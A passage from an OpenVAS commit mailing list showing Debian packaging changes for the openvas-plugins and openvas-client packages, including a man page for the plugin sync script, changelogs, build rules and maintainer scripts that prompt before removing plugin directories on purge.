nroff -*- +.TH OPENVAS-NVT-SYNC 8 "Septmeber 2008" "The OpenVAS Project" "User Manuals" +.SH NAME +openvas-nvt-sync \- updates the OpenVAS security checks +.SH SYNOPSIS +.B openvas-nvt-sync +.SH DESCRIPTION +The +.B OpenVAS Security Scanner +performs several security checks, each of them being coded as an external +plugin coded in NASL. As new security holes are published every day, new +plugins appear on the OpenVAS site (www.openvas.org) +.br +The script +.B openvas-nvt-sync +will fetch all the newest security checks for you and install them at the proper +location. Once this is done you will need to restart openvas-server(8) s +so that it loads them and uses them for new security scans. + +.br +.B openvas-nvt-sync +uses rsync(1) and md5sum(1) to do its job. In order to download the +new plugins the machine where the script runs needs to have +access to rsync.openvas.org using the rsync protocol (TCP/UDP port 873). + +.SH SECURITY NOTES +.B openvas-nvt-sync +uses rsync(1) to retrieve the archive of the new plugins. The scripts +provided by the OpenVAS project might +.B not be signed +\. Consequently, if somewhere where to poison your DNS server and force this +script to retrieve NASL plugins on another site he would force +your OpenVAS server to execute NASL scripts when running security tests. +Even if this might not do much harm (see the NASL reference guide +for more information on that subject) you should be very careful +when doing this. + +.SH SEE ALSO +For more information see: +.BR rsync(1), +.BR openvasd(8) +.BR openvas-client(1). +.br +There is more information available at +.B /usr/share/doc/openvas-plugins +on Debian systems. +.PP +You can find additional information about the OpenVAS project in +http://www.openvas.org + +.SH AUTHOR +This manual page was written by +Javier Fern\['a]ndez-Sanguino Pe\[~n]a +for the Debian GNU/Linux system (but may be used on other systems). +.PP +The +.B openvas-nvt-sync +script was written by DN-Systems Enterprise Internet Solutions GmbH. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1,4 @@ +usr/lib/openvas/plugins/find_service.nes var/lib/openvas/plugins/find_service.nes +usr/lib/openvas/plugins/openvas_tcp_scanner.nes var/lib/openvas/plugins/openvas_tcp_scanner.nes +usr/lib/openvas/plugins/ssl_ciphers.nes var/lib/openvas/plugins/ssl_ciphers.nes +usr/lib/openvas/plugins/synscan.nes var/lib/openvas/plugins/synscan.nes Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:40 UTC (rev 5415) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:45 UTC (rev 5416) @@ -0,0 +1 @@ +shlibs:Depends=libc6 (>= 2.3), libgcrypt11 (>= 1.4.2), libglib2.0-0 (>= 2.12.0), libgnutls26 (>= 2.7.14-0), libopenvas2 (>= 2.0.4), libpcap0.8 (>= 1.0.0-1) From scm-commit at wald.intevation.org Wed Oct 7 01:00:35 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:00:35 +0200 (CEST) Subject: [Openvas-commits] r5417 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian Message-ID: <20091006230035.2DFD5861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:00:34 +0200 (Wed, 07 Oct 2009) New Revision: 5417 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.preinst Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 Log: New package version (1.0.7-3) fixing minor bugs. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,3 +1,15 @@ +openvas-plugins-dfsg (1.0.7-3) unstable; urgency=low + + * Add slad_run.nasl to audit/remove-list since it ellicits an error + when starting openvasd + * Update the manual page to include a reference to RSYNC_PROXY, useful + for users behind a proxy + * Fix bug in grep call of audit/generate-license-list + * Rename openvas-plugins.* files to openvas-plugins-dfsg.* under debian/ so + that they are shipped as part of the package. + + -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 10:44:53 +0200 + openvas-plugins-dfsg (1.0.7-2) unstable; urgency=low * Provide this package in Debian which includes the openvas-nvt-sync required Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:00:34 UTC (rev 5417) @@ -23,6 +23,10 @@ new plugins the machine where the script runs needs to have access to rsync.openvas.org using the rsync protocol (TCP/UDP port 873). +If you are behind a web proxy you can configure rsync to use it through the +use of the RSYNC_PROXY environment variable. For more information see +rsync(1). + .SH SECURITY NOTES .B openvas-nvt-sync uses rsync(1) to retrieve the archive of the new plugins. The scripts Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs (from rev 5414, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.links (from rev 5416, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm) Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.preinst (from rev 5408, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,2 +0,0 @@ -var/lib/openvas/plugins -var/lib/openvas/plugins-factory Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.links 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,4 +0,0 @@ -usr/lib/openvas/plugins/find_service.nes var/lib/openvas/plugins/find_service.nes -usr/lib/openvas/plugins/openvas_tcp_scanner.nes var/lib/openvas/plugins/openvas_tcp_scanner.nes -usr/lib/openvas/plugins/ssl_ciphers.nes var/lib/openvas/plugins/ssl_ciphers.nes -usr/lib/openvas/plugins/synscan.nes var/lib/openvas/plugins/synscan.nes Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,32 +0,0 @@ -#!/bin/sh -e - -if [ "$1" = "purge" ] && [ -d /usr/lib/openvas/plugins ]; then - echo "" - echo "The /usr/lib/openvas/plugins directory still exists." - echo "This might be because you downloaded additional plugins into it" - echo "when using a previous Nessus version." - echo -n "Do you want to remove the full directory now? " - read ANSWER - case $ANSWER in - [yY]*) rm -rf /usr/lib/openvas/plugins ;; - esac -fi - -if [ "$1" = "purge" ] && [ -d /var/lib/openvas/plugins ]; then - echo "" - echo "The /var/lib/openvas/plugins directory still exists." - echo "This might be because you downloaded additional plugins into it." - if [ -d /var/lib/openvas/plugins/.desc ]; then - echo "Or because the openvasd package was not fully purged." - fi - echo "" - echo -n "Do you want to remove the full directory now? " - read ANSWER - case $ANSWER in - [yY]*) rm -rf /var/lib/openvas/plugins ;; - esac -fi - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 23:00:34 UTC (rev 5417) @@ -1,39 +0,0 @@ -#!/bin/sh -e -# Preinst script for openvas-plugins -# (c) 2004-2007 Javier Fernández-Sanguino - -PLUGINDIR=/var/lib/openvas/ -OPLUGINDIR=/usr/lib/openvas/ - -# Basicly, check if there is anything - -[ ! -d $OPLUGINDIR ] && exit 0 - -echo -n "Moving plugins from $OPLUGINDIR to $PLUGINDIR..." -if [ ! -d $PLUGINDIR ] ; then - mkdir -p $PLUGINDIR - chown root:root $PLUGINDIR - chmod 0766 $PLUGINDIR -fi - -# Now, we don't care about descriptions, they will be regenerated -[ -d "$OPLUGINDIR/.desc" ] && rm -rf $OPLUGINDIR/.desc -[ ! -d "$PLUGINDIR/.desc" ] && mkdir $PLUGINDIR/.desc - -find $OPLUGINDIR -maxdepth 1 -mindepth 1 | -while read content; do - base=`basename $content` - if [ -e "$PLUGINDIR/$base" ]; then - cp -a "$OPLUGINDIR/$base" $PLUGINDIR - rm -rf "$OPLUGINDIR/$base" - else - mv "$OPLUGINDIR/$base" $PLUGINDIR - fi -done - - -echo ".done" - -#DEBHELPER# - -exit 0 Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 22:57:45 UTC (rev 5416) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.substvars 2009-10-06 23:00:34 UTC (rev 5417) @@ -1 +0,0 @@ -shlibs:Depends=libc6 (>= 2.3), libgcrypt11 (>= 1.4.2), libglib2.0-0 (>= 2.12.0), libgnutls26 (>= 2.7.14-0), libopenvas2 (>= 2.0.4), libpcap0.8 (>= 1.0.0-1) From scm-commit at wald.intevation.org Wed Oct 7 01:04:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:04:01 +0200 (CEST) Subject: [Openvas-commits] r5418 - trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches Message-ID: <20091006230401.19D8E861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:04:00 +0200 (Wed, 07 Oct 2009) New Revision: 5418 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch Log: Add patch file for 1.0.7 package version Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 23:00:34 UTC (rev 5417) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 23:04:00 UTC (rev 5418) @@ -0,0 +1,18 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 10_fix_install_permissions.dpatch by Jan Wagner +## +## DP: fix permissions for shared libraries + + at DPATCH@ +diff -urNad openvas-plugins-1.0.7~/Makefile openvas-plugins-1.0.7/Makefile +--- openvas-plugins-1.0.7~/Makefile 2009-04-17 11:56:08.000000000 +0200 ++++ openvas-plugins-1.0.7/Makefile 2009-09-18 12:41:31.000000000 +0200 +@@ -33,7 +33,7 @@ + + install-nes: install-dirs + for plugins in bin/*.nes; do \ +- $(INSTALL) -m 555 $$plugins \ ++ $(INSTALL) -m 444 $$plugins \ + $(DESTDIR)${libdir}/openvas/plugins; \ + done + From scm-commit at wald.intevation.org Wed Oct 7 01:16:32 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:16:32 +0200 (CEST) Subject: [Openvas-commits] r5419 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . configuration Message-ID: <20091006231632.B97E1861EAAC@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 01:16:31 +0200 (Wed, 07 Oct 2009) New Revision: 5419 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/ Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: New debian package (1.0.7-4+svn20090920) dividing the sync script and the DFSG plugins into different packages (-base and -dfsg) Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 23:16:31 UTC (rev 5419) @@ -1,5 +1,21 @@ -openvas-plugins-dfsg (1.0.7-3) unstable; urgency=low +openvas-plugins-dfsg (1.0.7-4+svn20090920) unstable; urgency=low + * Create a new openvas-plugins-base binary package that provides the + .nes files as well as the openvas-nvt-sync script and manpage. + * Adjust dependencies of the packages accordingly, openvas-plugins-base + depends on rsync and openvas-plugins-dfsg depends on -base + * Add a lintian override for the errors related to using 'read' in + postrm. Debconf is not an option here since it might not be available. + * debian/rules improvements: + - Add dh_installmanpages to install the new manpage + - Add dh_installdirs in the install target + - Change dh_clean -k to dh_prep in the install target + + -- Javier Fernandez-Sanguino Pen~a Wed, 23 Sep 2009 00:08:26 +0200 + +openvas-plugins-dfsg (1.0.7-3+svn20090920) unstable; urgency=low + + * Update the plugins with their latest SVN versions * Add slad_run.nasl to audit/remove-list since it ellicits an error when starting openvasd * Update the manual page to include a reference to RSYNC_PROXY, useful @@ -7,6 +23,13 @@ * Fix bug in grep call of audit/generate-license-list * Rename openvas-plugins.* files to openvas-plugins-dfsg.* under debian/ so that they are shipped as part of the package. + * Create usr/lib and move the .nes files so dependencies get calculated + properly + * debian/rules improvements: + - make config.status depend on patch-stamp so that the configure + script does not get rerun when running the install target + - do not generate the audit exclude-list if already present + - separate exclude-file generation to its own target -- Javier Fernandez-Sanguino Pen~a Sun, 20 Sep 2009 10:44:53 +0200 Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration (from rev 5414, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config) Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/old-config/openvas-plugins-dfsg.templates.NEW 2009-10-06 22:56:33 UTC (rev 5414) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/configuration/openvas-plugins-dfsg.templates.NEW 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1,10 @@ +Template: openvas-plugins/remove_plugins_dir +Type: boolean +Default: true +_Description: Remove all the files in the OpenVAS plugins directory? + The /var/lib/openvas/plugins directory contains plugins besides + the ones distributed by the package. This might happen if you + have downloaded additional plugins (using openvas-nvt-sync) + . + You currently have ${countnewplugs} plugin(s) which have not been + provided by this package. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 23:16:31 UTC (rev 5419) @@ -12,7 +12,7 @@ Package: openvas-plugins-dfsg Section: net Architecture: any -Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Depends: ${misc:Depends}, openvas-plugins-base Recommends: openvas-server (>= 1.0), nmap, smbclient, snmp Suggests: openvas-client, pnscan, strobe, ike-scan Provides: openvas-plugins @@ -27,5 +27,19 @@ OpenVAS-Client, provides an X11/GTK+ user interface. . This package contains the DFSG-free OpenVAS plugins, a set of security tests - as well as scripts to build additional plugins. It also provides the - infrastructure for downloading updated plugins from OpenVAS. + as well as scripts to build additional plugins. + +Package: openvas-plugins-base +Section: net +Architecture: any +Depends: ${shlibs:Depends}, ${misc:Depends}, rsync +Recommends: openvas-server (>= 1.0), openvas-plugins-dfsg +Conflicts: openvas-server (<= 2.0.3-2) +Description: remote network security auditor - basic plugins + The Open Vulnerability Assessment System is a modular security auditing + tool, used for testing remote systems for vulnerabilities that should be + fixed. + . + This package contains the basic plugins: find_service, openvas_tcp_scanner, + ssl_ciphers and synscan. As well as the script needed for downloading updated + plugins from OpenVAS. Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages 2009-10-06 23:16:31 UTC (rev 5419) @@ -1 +0,0 @@ -debian/openvas-nvt-sync.8 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-nvt-sync.8 2009-10-06 23:16:31 UTC (rev 5419) @@ -31,8 +31,8 @@ .B openvas-nvt-sync uses rsync(1) to retrieve the archive of the new plugins. The scripts provided by the OpenVAS project might -.B not be signed -\. Consequently, if somewhere where to poison your DNS server and force this +.B not be signed. +Consequently, if somewhere where to poison your DNS server and force this script to retrieve NASL plugins on another site he would force your OpenVAS server to execute NASL scripts when running security tests. Even if this might not do much harm (see the NASL reference guide Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.install 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1,3 @@ +usr/lib/openvas/plugins +usr/sbin +usr/share/man Copied: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-base.manpages (from rev 5416, trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/manpages) Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.dirs 2009-10-06 23:16:31 UTC (rev 5419) @@ -1,2 +1,3 @@ var/lib/openvas/plugins var/lib/openvas/plugins-factory +usr/share/lintian/overrides Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.install 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1 @@ +var/lib/openvas/plugins Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.lintian-overrides 2009-10-06 23:16:31 UTC (rev 5419) @@ -0,0 +1,4 @@ +# We need to use read in the maintainer script +# in order to remove properly the files on purge. +# Debconf is not an option here since it might not be available: +openvas-plugins-dfsg binary: read-in-maintainer-script Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins-dfsg.postrm 2009-10-06 23:16:31 UTC (rev 5419) @@ -4,8 +4,8 @@ echo "" echo "The /usr/lib/openvas/plugins directory still exists." echo "This might be because you downloaded additional plugins into it" - echo "when using a previous Nessus version." - echo -n "Do you want to remove the full directory now? " + echo "when using a previous OpenVAS version." + echo -n "Do you want to remove the full directory now? (yes/no) " read ANSWER case $ANSWER in [yY]*) rm -rf /usr/lib/openvas/plugins ;; @@ -17,10 +17,10 @@ echo "The /var/lib/openvas/plugins directory still exists." echo "This might be because you downloaded additional plugins into it." if [ -d /var/lib/openvas/plugins/.desc ]; then - echo "Or because the openvasd package was not fully purged." + echo "Or because the openvas-server package was not fully purged." fi echo "" - echo -n "Do you want to remove the full directory now? " + echo -n "Do you want to remove the full directory now? (yes/no) " read ANSWER case $ANSWER in [yY]*) rm -rf /var/lib/openvas/plugins ;; Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 23:04:00 UTC (rev 5418) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules 2009-10-06 23:16:31 UTC (rev 5419) @@ -6,7 +6,7 @@ include /usr/share/dpatch/dpatch.make -tmp := $(CURDIR)/debian/openvas-plugins-dfsg +tmp := $(CURDIR)/debian/tmp CFLAGS := -g -Wall ifneq "$(findstring noopt,$(DEB_BUILD_OPTIONS))" "" @@ -16,13 +16,15 @@ endif build: build-stamp -build-stamp: config.status +build-stamp: config.status audit/exclude-list dh_testdir $(MAKE) - ( cd audit && sh exclude-plugins >exclude-list ) touch $@ -config.status: configure patch +audit/exclude-list: + ( cd audit && test -f exclude-list || sh exclude-plugins >exclude-list ) + +config.status: configure patch-stamp CFLAGS="$(CFLAGS)" ./configure --sysconfdir=/etc --prefix=/usr \ --mandir='$${prefix}/share/man' --localstatedir=/var/run \ --with-fetchcmd=wget --libdir=/var/lib @@ -34,43 +36,60 @@ touch openvas.tmpl [ ! -f Makefile ] || $(MAKE) distclean -rm -rf audit/exclude-list - dh_clean build-stamp + dh_clean build-stamp patched [ ! -f libtool ] || rm -f libtool [ ! -d bin/ ] || rm -rf bin/ -install: build-stamp +install: build-stamp audit/exclude-list dh_testdir dh_testroot - dh_clean -k + dh_prep + dh_installdirs $(MAKE) install prefix=$(tmp)/usr sysconfdir=$(tmp)/etc localstatedir=$(tmp)/var/run libdir=$(tmp)/var/lib -# After we install we remove the plugins we want to exclude and -# audit the remaining plugins +# After we install we remove the plugins we want to exclude from the +# package ( cd $(tmp)/var/lib/openvas/plugins ; cat $(CURDIR)/audit/exclude-list $(CURDIR)/audit/remove-list | xargs rm -f ) +# Move the libraries to /usr/lib + mkdir -p $(tmp)/usr/lib/openvas/plugins + mv $(tmp)/var/lib/openvas/plugins/*nes $(tmp)/usr/lib/openvas/plugins + cp debian/openvas-plugins-dfsg.lintian-overrides \ + debian/openvas-plugins-dfsg/usr/share/lintian/overrides/openvas-plugins-dfsg + + +audit-plugins: audit-plugins-stamp +audit-plugins-stamp: +# Audit the plugins installed in the package ( cd audit && sh audit-plugins $(tmp)/var/lib/openvas/plugins ) + touch $@ # If the audit passes we continue binary-indep: # Nothing to do, no arch-indep packages here. -binary-arch: install +binary-arch: install audit-plugins dh_testdir dh_testroot - dh_installdebconf +# Move the files to the openvas-plugins-base package + dh_install --sourcedir=$(tmp) dh_installdocs docs/plugins_api.txt + dh_installchangelogs + dh_installman -popenvas-plugins-base dh_installexamples extra/describe-openvas-plugin - dh_installchangelogs + dh_installdebconf dh_link ifeq "$(findstring nostrip,$(DEB_BUILD_OPTIONS))" "" dh_strip strip --strip-unneeded --remove-section=.comment --remove-section=.note \ - $(tmp)/var/lib/openvas/plugins/*.nes + debian/openvas-plugins-base/usr/lib/openvas/plugins/*.nes endif dh_compress dh_fixperms + dh_makeshlibs dh_installdeb - dpkg-shlibdeps -Tdebian/openvas-plugins.substvars \ - $(tmp)/var/lib/openvas/plugins/*.nes +# dh_shlibdeps + dpkg-shlibdeps -Tdebian/openvas-plugins-base.substvars \ + debian/openvas-plugins-base/usr/lib/openvas/plugins/*.nes dh_gencontrol dh_md5sums dh_builddeb From scm-commit at wald.intevation.org Wed Oct 7 01:18:00 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 01:18:00 +0200 (CEST) Subject: [Openvas-commits] r5420 - trunk/openvas-packaging/openvas-client/debian/trunk/debian Message-ID: <20091006231800.B5B58861EAAA@pyrosoma.intevation.org> Author: timb Date: 2009-10-07 01:18:00 +0200 (Wed, 07 Oct 2009) New Revision: 5420 Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-client/debian/trunk/debian/control trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules Log: Enable hardening-wrapper Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/changelog 2009-10-06 23:18:00 UTC (rev 5420) @@ -1,12 +1,16 @@ openvas-client (3.0.0-beta1) UNRELEASED; urgency=low + [ Jan-Oliver Wagner ] * New upstream release. * control: Added dependency to libopenvas3 * rules: Adjusted to name change nessus->openvas * copyright: Adjusted (libnessus is gone, new authors, copyright) - -- Jan-Oliver Wagner Wed, 30 Sep 2009 15:48:00 +0200 + [ Tim Brown ] + * Enable hardening-wrapper + -- Tim Brown Wed, 07 Oct 2009 00:17:13 +0100 + openvas-client (2.0.5-2) UNRELEASED; urgency=low * Add README.source Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/control 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/control 2009-10-06 23:18:00 UTC (rev 5420) @@ -3,7 +3,7 @@ Priority: extra Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), dpatch, autotools-dev, libssl-dev, libgtk2.0-dev, libgdchart-gd2-noxpm-dev, libopenvas3-dev +Build-Depends: debhelper (>= 5), dpatch, autotools-dev, libssl-dev, libgtk2.0-dev, libgdchart-gd2-noxpm-dev, libopenvas3-dev, hardening-wrapper Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-client/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-client/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules 2009-10-06 23:16:31 UTC (rev 5419) +++ trunk/openvas-packaging/openvas-client/debian/trunk/debian/rules 2009-10-06 23:18:00 UTC (rev 5420) @@ -9,6 +9,8 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +# Enable hardening-wrapper +export DEB_BUILD_HARDENING=1 # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) From scm-commit at wald.intevation.org Wed Oct 7 